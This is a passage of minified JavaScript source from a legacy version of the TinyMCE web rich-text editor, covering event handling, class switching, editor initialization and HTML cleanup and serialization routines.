false;}}if(tinyMCE.isMSIE&&tinyMCE.settings['force_br_newlines']&&e.keyCode==13){if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.selectedInstance){var sel=tinyMCE.selectedInstance.getDoc().selection;var rng=sel.createRange();if(tinyMCE.getParentElement(rng.parentElement(),"li")!=null)return false;e.returnValue=false;e.cancelBubble=true;rng.pasteHTML("<br />");rng.collapse(false);rng.select();tinyMCE.execCommand("mceAddUndoLevel");tinyMCE.triggerNodeChange(false);return false;}}if(e.keyCode==8||e.keyCode==46){tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(e.target,"a");tinyMCE.imgElement=tinyMCE.getParentElement(e.target,"img");tinyMCE.triggerNodeChange(false);}return false;break;case "keyup":case "keydown":if(e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];else return;if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var inst=tinyMCE.selectedInstance;if(tinyMCE.isGecko&&tinyMCE.settings['force_p_newlines']&&(e.keyCode==8||e.keyCode==46)&&!e.shiftKey){if(tinyMCE.selectedInstance._handleBackSpace(e.type)){tinyMCE.execCommand("mceAddUndoLevel");e.preventDefault();return false;}}tinyMCE.selectedElement=null;tinyMCE.selectedNode=null;var elm=tinyMCE.selectedInstance.getFocusElement();tinyMCE.linkElement=tinyMCE.getParentElement(elm,"a");tinyMCE.imgElement=tinyMCE.getParentElement(elm,"img");tinyMCE.selectedElement=elm;if(tinyMCE.isGecko&&e.type=="keyup"&&e.keyCode==9)tinyMCE.handleVisualAid(tinyMCE.selectedInstance.getBody(),true,tinyMCE.settings['visual'],tinyMCE.selectedInstance);if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href&&e.type=="keyup"&&e.ctrlKey&&e.keyCode==86)tinyMCE.selectedInstance.fixBrokenURLs();if(tinyMCE.isMSIE&&e.type=="keydown"&&e.keyCode==13)tinyMCE.enterKeyElement=tinyMCE.selectedInstance.getFocusElement();if(tinyMCE.isMSIE&&e.type=="keyup"&&e.keyCode==13){var elm=tinyMCE.enterKeyElement;if(elm){var re=new RegExp('^HR|IMG|BR$','g');var dre=new RegExp('^H[1-6]$','g');if(!elm.hasChildNodes()&&!re.test(elm.nodeName)){if(dre.test(elm.nodeName))elm.innerHTML=" ";else elm.innerHTML=" ";}}}var keys=tinyMCE.posKeyCodes;var posKey=false;for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){posKey=true;break;}}if(tinyMCE.isMSIE&&tinyMCE.settings['custom_undo_redo']){var keys=new Array(8,46);for(var i=0;i<keys.length;i++){if(keys[i]==e.keyCode){if(e.type=="keyup")tinyMCE.triggerNodeChange(false);}}if(tinyMCE.settings['custom_undo_redo_keyboard_shortcuts']){if(e.keyCode==90&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Undo");tinyMCE.triggerNodeChange(false);}if(e.keyCode==89&&(e.ctrlKey&&!e.altKey)&&e.type=="keydown"){tinyMCE.selectedInstance.execCommand("Redo");tinyMCE.triggerNodeChange(false);}if((e.keyCode==90||e.keyCode==89)&&(e.ctrlKey&&!e.altKey)){e.returnValue=false;e.cancelBubble=true;return false;}}}if(!posKey&&e.type=="keyup")tinyMCE.execCommand("mceStartTyping");if(e.type=="keyup"&&(posKey||e.ctrlKey))tinyMCE.execCommand("mceEndTyping");if(posKey&&e.type=="keyup")tinyMCE.triggerNodeChange(false);if(tinyMCE.isMSIE&&e.ctrlKey)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);break;case "mousedown":case "mouseup":case "click":case "focus":if(tinyMCE.selectedInstance)tinyMCE.selectedInstance.switchSettings();var targetBody=tinyMCE.getParentElement(e.target,"body");for(var instanceName in tinyMCE.instances){if(!tinyMCE.isInstance(tinyMCE.instances[instanceName]))continue;var inst=tinyMCE.instances[instanceName];inst.autoResetDesignMode();if(inst.getBody()==targetBody){tinyMCE.selectedInstance=inst;tinyMCE.selectedElement=e.target;tinyMCE.linkElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");tinyMCE.imgElement=tinyMCE.getParentElement(tinyMCE.selectedElement,"img");break;}}if(tinyMCE.isSafari){tinyMCE.selectedInstance.lastSafariSelection=tinyMCE.selectedInstance.getBookmark();tinyMCE.selectedInstance.lastSafariSelectedElement=tinyMCE.selectedElement;var lnk=tinyMCE.getParentElement(tinyMCE.selectedElement,"a");if(lnk&&e.type=="mousedown"){lnk.setAttribute("mce_real_href",lnk.getAttribute("href"));lnk.setAttribute("href","javascript:void(0);");}if(lnk&&e.type=="click"){window.setTimeout(function(){lnk.setAttribute("href",lnk.getAttribute("mce_real_href"));lnk.removeAttribute("mce_real_href");},10);}}if(e.type!="focus")tinyMCE.selectedNode=null;tinyMCE.triggerNodeChange(false);tinyMCE.execCommand("mceEndTyping");if(e.type=="mouseup")tinyMCE.execCommand("mceAddUndoLevel");if(!tinyMCE.selectedInstance&&e.target.editorId)tinyMCE.selectedInstance=tinyMCE.instances[e.target.editorId];if(tinyMCE.isGecko&&tinyMCE.settings['document_base_url']!=""+document.location.href)window.setTimeout('tinyMCE.getInstanceById("'+inst.editorId+'").fixBrokenURLs();',10);return false;break;}};TinyMCE.prototype.switchClass=function(element,class_name,lock_state){var lockChanged=false;if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.oldClassName=element.className;element.className=class_name;}};TinyMCE.prototype.restoreAndSwitchClass=function(element,class_name){if(element!=null&&!element.classLock){this.restoreClass(element);this.switchClass(element,class_name);}};TinyMCE.prototype.switchClassSticky=function(element_name,class_name,lock_state){var element,lockChanged=false;if(!this.stickyClassesLookup[element_name])this.stickyClassesLookup[element_name]=document.getElementById(element_name);element=this.stickyClassesLookup[element_name];if(typeof(lock_state)!="undefined"&&element!=null){element.classLock=lock_state;lockChanged=true;}if(element!=null&&(lockChanged||!element.classLock)){element.className=class_name;element.oldClassName=class_name;if(tinyMCE.isOpera){if(class_name=="mceButtonDisabled"){var suffix="";if(!element.mceOldSrc)element.mceOldSrc=element.src;if(this.operaOpacityCounter>-1)suffix='?rnd='+this.operaOpacityCounter++;element.src=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/images/opacity.png"+suffix;element.style.backgroundImage="url('"+element.mceOldSrc+"')";}else{if(element.mceOldSrc){element.src=element.mceOldSrc;element.parentNode.style.backgroundImage="";element.mceOldSrc=null;}}}}};TinyMCE.prototype.restoreClass=function(element){if(element!=null&&element.oldClassName&&!element.classLock){element.className=element.oldClassName;element.oldClassName=null;}};TinyMCE.prototype.setClassLock=function(element,lock_state){if(element!=null)element.classLock=lock_state;};TinyMCE.prototype.addEvent=function(obj,name,handler){if(tinyMCE.isMSIE){obj.attachEvent("on"+name,handler);}else obj.addEventListener(name,handler,false);};TinyMCE.prototype.submitPatch=function(){tinyMCE.removeTinyMCEFormElements(this);tinyMCE.triggerSave();this.mceOldSubmit();tinyMCE.isNotDirty=true;};TinyMCE.prototype.onLoad=function(){for(var c=0;c<tinyMCE.configs.length;c++){tinyMCE.settings=tinyMCE.configs[c];var selector=tinyMCE.getParam("editor_selector");var deselector=tinyMCE.getParam("editor_deselector");var elementRefAr=new Array();if(document.forms&&tinyMCE.settings['add_form_submit_trigger']&&!tinyMCE.submitTriggers){for(var i=0;i<document.forms.length;i++){var form=document.forms[i];tinyMCE.addEvent(form,"submit",TinyMCE.prototype.handleEvent);tinyMCE.addEvent(form,"reset",TinyMCE.prototype.handleEvent);tinyMCE.submitTriggers=true;if(tinyMCE.settings['submit_patch']){try{form.mceOldSubmit=form.submit;form.submit=TinyMCE.prototype.submitPatch;}catch(e){}}}}var mode=tinyMCE.settings['mode'];switch(mode){case "exact":var elements=tinyMCE.getParam('elements','',true,',');for(var i=0;i<elements.length;i++){var element=tinyMCE._getElementById(elements[i]);var trigger=element?element.getAttribute(tinyMCE.settings['textarea_trigger']):"";if(tinyMCE.getAttrib(element,"class").indexOf(deselector)!=-1)continue;if(trigger=="false")continue;if(tinyMCE.settings['ask']&&element){elementRefAr[elementRefAr.length]=element;continue;}if(element)tinyMCE.addMCEControl(element,elements[i]);else if(tinyMCE.settings['debug'])alert("Error: Could not find element by id or name: "+elements[i]);}break;case "specific_textareas":case "textareas":var nodeList=document.getElementsByTagName("textarea");for(var i=0;i<nodeList.length;i++){var elm=nodeList.item(i);var trigger=elm.getAttribute(tinyMCE.settings['textarea_trigger']);if(selector!=''&&tinyMCE.getAttrib(elm,"class").indexOf(selector)==-1)continue;if(tinyMCE.getAttrib(elm,"class").indexOf(deselector)!=-1)continue;if((mode=="specific_textareas"&&trigger=="true")||(mode=="textareas"&&trigger!="false"))elementRefAr[elementRefAr.length]=elm;}break;}for(var i=0;i<elementRefAr.length;i++){var element=elementRefAr[i];var elementId=element.name?element.name:element.id;if(tinyMCE.settings['ask']){if(tinyMCE.isGecko){var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(e){window.setTimeout(function(){TinyMCE.prototype.confirmAdd(e,settings);},10);});}else{var settings=tinyMCE.settings;tinyMCE.addEvent(element,"focus",function(){TinyMCE.prototype.confirmAdd(null,settings);});}}else tinyMCE.addMCEControl(element,elementId);}if(tinyMCE.settings['auto_focus']){window.setTimeout(function(){var inst=tinyMCE.getInstanceById(tinyMCE.settings['auto_focus']);inst.selectNode(inst.getBody(),true,true);inst.contentWindow.focus();},10);}tinyMCE.executeCallback('oninit','_oninit',0);}};TinyMCE.prototype.removeMCEControl=function(editor_id){var inst=tinyMCE.getInstanceById(editor_id);if(inst){inst.switchSettings();editor_id=inst.editorId;var html=tinyMCE.getContent(editor_id);var tmpInstances=new Array();for(var instanceName in tinyMCE.instances){var instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;if(instanceName!=editor_id)tmpInstances[instanceName]=instance;}tinyMCE.instances=tmpInstances;tinyMCE.selectedElement=null;tinyMCE.selectedInstance=null;var replaceElement=document.getElementById(editor_id+"_parent");var oldTargetElement=inst.oldTargetElement;var targetName=oldTargetElement.nodeName.toLowerCase();if(targetName=="textarea"||targetName=="input"){replaceElement.parentNode.removeChild(replaceElement);oldTargetElement.style.display="inline";oldTargetElement.value=html;}else{oldTargetElement.innerHTML=html;replaceElement.parentNode.insertBefore(oldTargetElement,replaceElement);replaceElement.parentNode.removeChild(replaceElement);}}};TinyMCE.prototype._cleanupElementName=function(element_name,element){var name="";element_name=element_name.toLowerCase();if(element_name=="body")return null;if(tinyMCE.cleanup_verify_html){for(var i=0;i<tinyMCE.cleanup_invalidElements.length;i++){if(tinyMCE.cleanup_invalidElements[i]==element_name)return null;}var validElement=false;var elementAttribs=null;for(var i=0;i<tinyMCE.cleanup_validElements.length&&!elementAttribs;i++){for(var x=0,n=tinyMCE.cleanup_validElements[i][0].length;x<n;x++){var elmMatch=tinyMCE.cleanup_validElements[i][0][x];if(elmMatch.charAt(0)=='+'||elmMatch.charAt(0)=='-')elmMatch=elmMatch.substring(1);if(elmMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){elmMatch=elmMatch.replace(new RegExp('\\?','g'),'(\\S?)');elmMatch=elmMatch.replace(new RegExp('\\+','g'),'(\\S+)');elmMatch=elmMatch.replace(new RegExp('\\*','g'),'(\\S*)');elmMatch="^"+elmMatch+"$";if(element_name.match(new RegExp(elmMatch,'g'))){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;break;}}if(element_name==elmMatch){elementAttribs=tinyMCE.cleanup_validElements[i];validElement=true;element_name=elementAttribs[0][0];break;}}}if(!validElement)return null;}if(element_name.charAt(0)=='+'||element_name.charAt(0)=='-')name=element_name.substring(1);if(!tinyMCE.isMSIE){if(name=="strong"&&!tinyMCE.cleanup_on_save)element_name="b";else if(name=="em"&&!tinyMCE.cleanup_on_save)element_name="i";}var elmData=new Object();elmData.element_name=element_name;elmData.valid_attribs=elementAttribs;return elmData;};TinyMCE.prototype._moveStyle=function(elm,style,attrib){if(tinyMCE.cleanup_inline_styles){var val=tinyMCE.getAttrib(elm,attrib);if(val!=''){val=''+val;switch(attrib){case "background":val="url('"+val+"');";break;case "bordercolor":if(elm.style.borderStyle==''||elm.style.borderStyle=='none')elm.style.borderStyle='solid';break;case "border":case "width":case "height":if(attrib=="border"&&elm.style.borderWidth>0)return;if(val.indexOf('%')==-1)val+='px';break;case "vspace":case "hspace":elm.style.marginTop=val+"px";elm.style.marginBottom=val+"px";elm.removeAttribute(attrib);return;case "align":if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE)elm.style.styleFloat=val;else elm.style.cssFloat=val;}else elm.style.textAlign=val;elm.removeAttribute(attrib);return;}if(val!=''){eval('elm.style.'+style+' = val;');elm.removeAttribute(attrib);}}}else{if(style=='')return;var val=eval('elm.style.'+style)==''?tinyMCE.getAttrib(elm,attrib):eval('elm.style.'+style);val=val==null?'':''+val;switch(attrib){case "background":if(val.indexOf('url')==-1&&val!='')val="url('"+val+"');";if(val!=''){elm.style.backgroundImage=val;elm.removeAttribute(attrib);}return;case "border":case "width":case "height":val=val.replace('px','');break;case "align":if(tinyMCE.getAttrib(elm,'align')==''){if(elm.nodeName=="IMG"){if(tinyMCE.isMSIE&&elm.style.styleFloat!=''){val=elm.style.styleFloat;style='styleFloat';}else if(tinyMCE.isGecko&&elm.style.cssFloat!=''){val=elm.style.cssFloat;style='cssFloat';}}}break;}if(val!=''){elm.removeAttribute(attrib);elm.setAttribute(attrib,val);eval('elm.style.'+style+' = "";');}}};TinyMCE.prototype._cleanupAttribute=function(valid_attributes,element_name,attribute_node,element_node){var attribName=attribute_node.nodeName.toLowerCase();var attribValue=attribute_node.nodeValue;var attribMustBeValue=null;var verified=false;if(attribName.indexOf('moz_')!=-1)return null;if(!tinyMCE.isMSIE&&(attribName=="mce_real_href"||attribName=="mce_real_src")){if(!tinyMCE.cleanup_on_save){var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;}else return null;}if(tinyMCE.cleanup_verify_html&&!verified){for(var i=1;i<valid_attributes.length;i++){var attribMatch=valid_attributes[i][0];var re=null;if(attribMatch.match(new RegExp('\\*|\\?|\\+','g'))!=null){attribMatch=attribMatch.replace(new RegExp('\\?','g'),'(\\S?)');attribMatch=attribMatch.replace(new RegExp('\\+','g'),'(\\S+)');attribMatch=attribMatch.replace(new RegExp('\\*','g'),'(\\S*)');attribMatch="^"+attribMatch+"$";re=new RegExp(attribMatch,'g');}if((re&&attribName.match(re)!=null)||attribName==attribMatch){verified=true;attribMustBeValue=valid_attributes[i][3];break;}}if(!verified)return false;}else verified=true;switch(attribName){case "size":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.size;break;case "width":case "height":case "border":if(tinyMCE.isMSIE5)attribValue=eval("element_node."+attribName);break;case "shape":attribValue=attribValue.toLowerCase();break;case "cellspacing":if(tinyMCE.isMSIE5)attribValue=element_node.cellSpacing;break;case "cellpadding":if(tinyMCE.isMSIE5)attribValue=element_node.cellPadding;break;case "color":if(tinyMCE.isMSIE5&&element_name=="font")attribValue=element_node.color;break;case "class":if(tinyMCE.cleanup_on_save&&attribValue.indexOf('mceItemAnchor')!=-1)attribValue=attribValue.replace(/mceItem[a-z0-9]+/gi,'');if(element_name=="table"||element_name=="td"){if(tinyMCE.cleanup_visual_table_class!="")attribValue=tinyMCE.getVisualAidClass(attribValue,!tinyMCE.cleanup_on_save);}if(!tinyMCE._verifyClass(element_node)||attribValue=="")return null;break;case "onfocus":case "onblur":case "onclick":case "ondblclick":case "onmousedown":case "onmouseup":case "onmouseover":case "onmousemove":case "onmouseout":case "onkeypress":case "onkeydown":case "onkeydown":case "onkeyup":attribValue=tinyMCE.cleanupEventStr(""+attribValue);if(attribValue.indexOf('return false;')==0)attribValue=attribValue.substring(14);break;case "style":attribValue=tinyMCE.serializeStyle(tinyMCE.parseStyle(tinyMCE.getAttrib(element_node,"style")));break;case "href":case "src":if(tinyMCE.isGecko18&&attribName=="src")attribValue=element_node.src;if(!tinyMCE.isMSIE&&attribName=="href"&&element_node.getAttribute("mce_real_href"))attribValue=element_node.getAttribute("mce_real_href");if(!tinyMCE.isMSIE&&attribName=="src"&&element_node.getAttribute("mce_real_src"))attribValue=element_node.getAttribute("mce_real_src");if(tinyMCE.isGecko&&!tinyMCE.getParam('relative_urls'))attribValue=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],attribValue);attribValue=eval(tinyMCE.cleanup_urlconverter_callback+"(attribValue, element_node, tinyMCE.cleanup_on_save);");break;case "colspan":case "rowspan":if(attribValue=="1")return null;break;case "_moz-userdefined":case "editorid":case "mce_real_href":case "mce_real_src":return null;}if(attribMustBeValue!=null){var isCorrect=false;for(var i=0;i<attribMustBeValue.length;i++){if(attribValue==attribMustBeValue[i]){isCorrect=true;break;}}if(!isCorrect)return null;}var attrib=new Object();attrib.name=attribName;attrib.value=attribValue;return attrib;};TinyMCE.prototype.clearArray=function(ar){for(var key in ar)ar[key]=null;};TinyMCE.prototype.isInstance=function(inst){return inst!=null&&typeof(inst)=="object"&&inst.isTinyMCEControl;};TinyMCE.prototype.parseStyle=function(str){var ar=new Array();if(str==null)return ar;var st=str.split(';');tinyMCE.clearArray(ar);for(var i=0;i<st.length;i++){if(st[i]=='')continue;var re=new RegExp('^\\s*([^:]*):\\s*(.*)\\s*$');var pa=st[i].replace(re,'$1||$2').split('||');if(pa.length==2)ar[pa[0].toLowerCase()]=pa[1];}return ar;};TinyMCE.prototype.compressStyle=function(ar,pr,sf,res){var box=new Array();box[0]=ar[pr+'-top'+sf];box[1]=ar[pr+'-left'+sf];box[2]=ar[pr+'-right'+sf];box[3]=ar[pr+'-bottom'+sf];for(var i=0;i<box.length;i++){if(box[i]==null)return;for(var a=0;a<box.length;a++){if(box[a]!=box[i])return;}}ar[res]=box[0];ar[pr+'-top'+sf]=null;ar[pr+'-left'+sf]=null;ar[pr+'-right'+sf]=null;ar[pr+'-bottom'+sf]=null;};TinyMCE.prototype.serializeStyle=function(ar){var str="";tinyMCE.compressStyle(ar,"border","","border");tinyMCE.compressStyle(ar,"border","-width","border-width");tinyMCE.compressStyle(ar,"border","-color","border-color");for(var key in ar){var val=ar[key];if(typeof(val)=='function')continue;if(val!=null&&val!=''){val=''+val;val=val.replace(new RegExp("url\\(\\'?([^\\']*)\\'?\\)",'gi'),"url('$1')");if(tinyMCE.getParam("force_hex_style_colors"))val=tinyMCE.convertRGBToHex(val);if(val!="url('')")str+=key.toLowerCase()+": "+val+"; ";}}if(new RegExp('; $').test(str))str=str.substring(0,str.length-2);return str;};TinyMCE.prototype.convertRGBToHex=function(s){if(s.toLowerCase().indexOf('rgb')!=-1){var re=new RegExp("rgb\\s*\\(\\s*([0-9]+).*,\\s*([0-9]+).*,\\s*([0-9]+).*\\)","gi");var rgb=s.replace(re,"$1,$2,$3").split(',');if(rgb.length==3){r=parseInt(rgb[0]).toString(16);g=parseInt(rgb[1]).toString(16);b=parseInt(rgb[2]).toString(16);r=r.length==1?'0'+r:r;g=g.length==1?'0'+g:g;b=b.length==1?'0'+b:b;s="#"+r+g+b;}}return s;};TinyMCE.prototype._verifyClass=function(node){if(tinyMCE.isGecko){var className=node.getAttribute('class');if(!className)return false;}if(tinyMCE.isMSIE)var className=node.getAttribute('className');if(tinyMCE.cleanup_verify_css_classes&&tinyMCE.cleanup_on_save){var csses=tinyMCE.getCSSClasses();nonDefinedCSS=true;for(var c=0;c<csses.length;c++){if(csses[c]==className){nonDefinedCSS=false;break;}}if(nonDefinedCSS&&className.indexOf('mce_')!=0){node.removeAttribute('className');node.removeAttribute('class');return false;}}return true;};TinyMCE.prototype.cleanupNode=function(node){var output="";switch(node.nodeType){case 1:var elementData=tinyMCE._cleanupElementName(node.nodeName,node);var elementName=elementData?elementData.element_name:null;var elementValidAttribs=elementData?elementData.valid_attribs:null;var elementAttribs="";var openTag=false,nonEmptyTag=false;if(elementName!=null&&elementName.charAt(0)=='+'){elementName=elementName.substring(1);openTag=true;}if(elementName!=null&&elementName.charAt(0)=='-'){elementName=elementName.substring(1);nonEmptyTag=true;}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var lookup=tinyMCE.cleanup_elementLookupTable;for(var i=0;i<lookup.length;i++){if(lookup[i]==node)return output;}lookup[lookup.length]=node;}if(!elementName){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return output;}if(tinyMCE.cleanup_on_save){if(node.nodeName=="A"&&node.className=="mceItemAnchor"){if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);}return '<a name="'+this.convertStringToXML(node.getAttribute("name"))+'"></a>'+output;}}var re=new RegExp("^(TABLE|TD|TR)$");if(re.test(node.nodeName)){if((node.nodeName!="TABLE"||tinyMCE.cleanup_inline_styles)&&(width=tinyMCE.getAttrib(node,"width"))!=''){node.style.width=width.indexOf('%')!=-1?width:width.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("width");}if((node.nodeName=="TABLE"&&!tinyMCE.cleanup_inline_styles)&&node.style.width!=''){tinyMCE.setAttrib(node,"width",node.style.width.replace('px',''));node.style.width='';}if((height=tinyMCE.getAttrib(node,"height"))!=''){node.style.height=height.indexOf('%')!=-1?height:height.replace(/[^0-9]/gi,'')+"px";node.removeAttribute("height");}}if(tinyMCE.cleanup_inline_styles){var re=new RegExp("^(TABLE|TD|TR|IMG|HR)$");if(re.test(node.nodeName)){tinyMCE._moveStyle(node,'width','width');tinyMCE._moveStyle(node,'height','height');tinyMCE._moveStyle(node,'borderWidth','border');tinyMCE._moveStyle(node,'','vspace');tinyMCE._moveStyle(node,'','hspace');tinyMCE._moveStyle(node,'textAlign','align');tinyMCE._moveStyle(node,'backgroundColor','bgColor');tinyMCE._moveStyle(node,'borderColor','borderColor');tinyMCE._moveStyle(node,'backgroundImage','background');if(tinyMCE.isMSIE5)node.outerHTML=node.outerHTML;}else if(tinyMCE.isBlockElement(node))tinyMCE._moveStyle(node,'textAlign','align');if(node.nodeName=="FONT")tinyMCE._moveStyle(node,'color','color');}if(elementValidAttribs){for(var a=1;a<elementValidAttribs.length;a++){var attribName,attribDefaultValue,attribForceValue,attribValue;attribName=elementValidAttribs[a][0];attribDefaultValue=elementValidAttribs[a][1];attribForceValue=elementValidAttribs[a][2];if(attribDefaultValue!=null||attribForceValue!=null){var attribValue=node.getAttribute(attribName);if(node.getAttribute(attribName)==null||node.getAttribute(attribName)=="")attribValue=attribDefaultValue;attribValue=attribForceValue?attribForceValue:attribValue;if(attribValue=="{$uid}")attribValue="uid_"+(tinyMCE.cleanup_idCount++);if(attribName=="class")attribValue=tinyMCE.getVisualAidClass(attribValue,tinyMCE.cleanup_on_save);node.setAttribute(attribName,attribValue);}}}if((tinyMCE.isMSIE&&!tinyMCE.isOpera)&&elementName=="style")return "<style>"+node.innerHTML+"</style>";if(elementName=="table"&&!node.hasChildNodes())return "";if(node.attributes.length>0){var lastAttrib="";for(var i=0;i<node.attributes.length;i++){if(node.attributes[i].specified){if(tinyMCE.isOpera){if(node.attributes[i].nodeName==lastAttrib)continue;lastAttrib=node.attributes[i].nodeName;}var attrib=tinyMCE._cleanupAttribute(elementValidAttribs,elementName,node.attributes[i],node);if(attrib&&attrib.value!="")elementAttribs+=" "+attrib.name+"="+'"'+this.convertStringToXML(""+attrib.value)+'"';}}}if(tinyMCE.isMSIE&&elementName=="table"&&node.getAttribute("summary")!=null&&elementAttribs.indexOf('summary')==-1){var summary=tinyMCE.getAttrib(node,'summary');if(summary!='')elementAttribs+=" summary="+'"'+this.convertStringToXML(summary)+'"';}if(tinyMCE.isMSIE5&&/^(td|img|a)$/.test(elementName)){var ma=new Array("scope","longdesc","hreflang","charset","type");for(var u=0;u<ma.length;u++){if(node.getAttribute(ma[u])!=null){var s=tinyMCE.getAttrib(node,ma[u]);if(s!='')elementAttribs+=" "+ma[u]+"="+'"'+this.convertStringToXML(s)+'"';}}}if(tinyMCE.isMSIE&&elementName=="input"){if(node.type){if(!elementAttribs.match(/type=/g))elementAttribs+=" type="+'"'+node.type+'"';}if(node.value){if(!elementAttribs.match(/value=/g))elementAttribs+=" value="+'"'+node.value+'"';}}if((elementName=="p"||elementName=="td")&&(node.innerHTML==""||node.innerHTML==" "))return "<"+elementName+elementAttribs+">"+this.convertStringToXML(String.fromCharCode(160))+"</"+elementName+">";if(tinyMCE.isMSIE&&elementName=="script")return "<"+elementName+elementAttribs+">"+node.text+"</"+elementName+">";if(node.hasChildNodes()){if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="<div"+elementAttribs+">";else output+="<"+elementName+elementAttribs+">";}for(var i=0;i<node.childNodes.length;i++)output+=this.cleanupNode(node.childNodes[i]);if(!(elementName=="span"&&elementAttribs==""&&tinyMCE.getParam("trim_span_elements"))){if(elementName=="p"&&tinyMCE.cleanup_force_br_newlines)output+="</div><br />";else output+="</"+elementName+">";}}else{if(!nonEmptyTag){if(openTag)output+="<"+elementName+elementAttribs+"></"+elementName+">";else output+="<"+elementName+elementAttribs+" />";}}return output;case 3:if(node.parentNode.nodeName=="SCRIPT"||node.parentNode.nodeName=="STYLE")return node.nodeValue;return this.convertStringToXML(node.nodeValue);case 8:return "<!--"+node.nodeValue+"-->";default:return "[UNKNOWN NODETYPE "+node.nodeType+"]";}};TinyMCE.prototype.convertStringToXML=function(html_data){var output="";for(var i=0;i<html_data.length;i++){var chr=html_data.charCodeAt(i);if(tinyMCE.settings['entity_encoding']=="numeric"){if(chr>127)output+='&#'+chr+";";else output+=String.fromCharCode(chr);continue;}if(tinyMCE.settings['entity_encoding']=="raw"){output+=String.fromCharCode(chr);continue;}if(typeof(tinyMCE.cleanup_entities["c"+chr])!='undefined'&&tinyMCE.cleanup_entities["c"+chr]!='')output+='&'+tinyMCE.cleanup_entities["c"+chr]+';';else output+=''+String.fromCharCode(chr);}return output;};TinyMCE.prototype._getCleanupElementName=function(chunk){var pos;if(chunk.charAt(0)=='+')chunk=chunk.substring(1);if(chunk.charAt(0)=='-')chunk=chunk.substring(1);if((pos=chunk.indexOf('/'))!=-1)chunk=chunk.substring(0,pos);if((pos=chunk.indexOf('['))!=-1)chunk=chunk.substring(0,pos);return chunk;};TinyMCE.prototype._initCleanup=function(){var validElements=tinyMCE.settings["valid_elements"];validElements=validElements.split(',');var extendedValidElements=tinyMCE.settings["extended_valid_elements"];extendedValidElements=extendedValidElements.split(',');for(var i=0;i<extendedValidElements.length;i++){var elementName=this._getCleanupElementName(extendedValidElements[i]);var skipAdd=false;for(var x=0;x<validElements.length;x++){if(this._getCleanupElementName(validElements[x])==elementName){validElements[x]=extendedValidElements[i];skipAdd=true;break;}}if(!skipAdd)validElements[validElements.length]=extendedValidElements[i];}for(var i=0;i<validElements.length;i++){var item=validElements[i];item=item.replace('[','|');item=item.replace(']','');var attribs=item.split('|');for(var x=0;x<attribs.length;x++)attribs[x]=attribs[x].toLowerCase();attribs[0]=attribs[0].split('/');for(var x=1;x<attribs.length;x++){var attribName=attribs[x];var attribDefault=null;var attribForce=null;var attribMustBe=null;if((pos=attribName.indexOf('='))!=-1){attribDefault=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf(':'))!=-1){attribForce=attribName.substring(pos+1);attribName=attribName.substring(0,pos);}if((pos=attribName.indexOf('<'))!=-1){attribMustBe=attribName.substring(pos+1).split('?');attribName=attribName.substring(0,pos);}attribs[x]=new Array(attribName,attribDefault,attribForce,attribMustBe);}validElements[i]=attribs;}var invalidElements=tinyMCE.settings['invalid_elements'].split(',');for(var i=0;i<invalidElements.length;i++)invalidElements[i]=invalidElements[i].toLowerCase();tinyMCE.settings['cleanup_validElements']=validElements;tinyMCE.settings['cleanup_invalidElements']=invalidElements;tinyMCE.settings['cleanup_entities']=new Array();var entities=tinyMCE.getParam('entities','',true,',');for(var i=0;i<entities.length;i+=2)tinyMCE.settings['cleanup_entities']['c'+entities[i]]=entities[i+1];};TinyMCE.prototype._cleanupHTML=function(inst,doc,config,element,visual,on_save){if(!tinyMCE.settings['cleanup'])return element.innerHTML;if(on_save&&tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertFontsToSpans(doc);tinyMCE._customCleanup(inst,on_save?"get_from_editor_dom":"insert_to_editor_dom",doc.body);tinyMCE.cleanup_validElements=tinyMCE.settings['cleanup_validElements'];tinyMCE.cleanup_entities=tinyMCE.settings['cleanup_entities'];tinyMCE.cleanup_invalidElements=tinyMCE.settings['cleanup_invalidElements'];tinyMCE.cleanup_verify_html=tinyMCE.settings['verify_html'];tinyMCE.cleanup_force_br_newlines=tinyMCE.settings['force_br_newlines'];tinyMCE.cleanup_urlconverter_callback=tinyMCE.settings['urlconverter_callback'];tinyMCE.cleanup_verify_css_classes=tinyMCE.settings['verify_css_classes'];tinyMCE.cleanup_visual_table_class=tinyMCE.settings['visual_table_class'];tinyMCE.cleanup_apply_source_formatting=tinyMCE.settings['apply_source_formatting'];tinyMCE.cleanup_inline_styles=tinyMCE.settings['inline_styles'];tinyMCE.cleanup_visual_aid=visual;tinyMCE.cleanup_on_save=on_save;tinyMCE.cleanup_idCount=0;tinyMCE.cleanup_elementLookupTable=new Array();var startTime=new Date().getTime();if(tinyMCE.isMSIE){var nodes=element.getElementsByTagName("hr");for(var 